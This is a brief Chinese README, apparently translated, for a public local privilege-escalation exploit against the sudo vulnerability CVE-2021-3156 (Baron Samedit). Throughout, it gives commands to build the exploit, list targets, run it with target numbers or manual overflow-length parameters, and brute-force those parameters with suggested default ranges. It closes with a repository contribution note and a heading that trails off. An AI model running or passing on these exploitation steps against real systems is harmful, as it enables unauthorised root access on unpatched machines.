
这是针对 CVE-2021-3156 sudo 漏洞(由 Qualys 称为 Baron Samedit)的利用程序。
构建:
$ make
目标列表:
$ ./sudo-hax-me-a-sandwich
运行:
$ ./sudo-hax-me-a-sandwich <目标编号>
手动模式:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
确保已安装 GNU parallel。
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
一些可尝试的默认值:
$ ./brute.sh 90 120 50 70 150 300
它将消耗所有可用核心。不要尝试一边看Netflix一边暴力破解。
向仓库贡献 发送合理的PR,我可以合并。 点个星标
一些想法: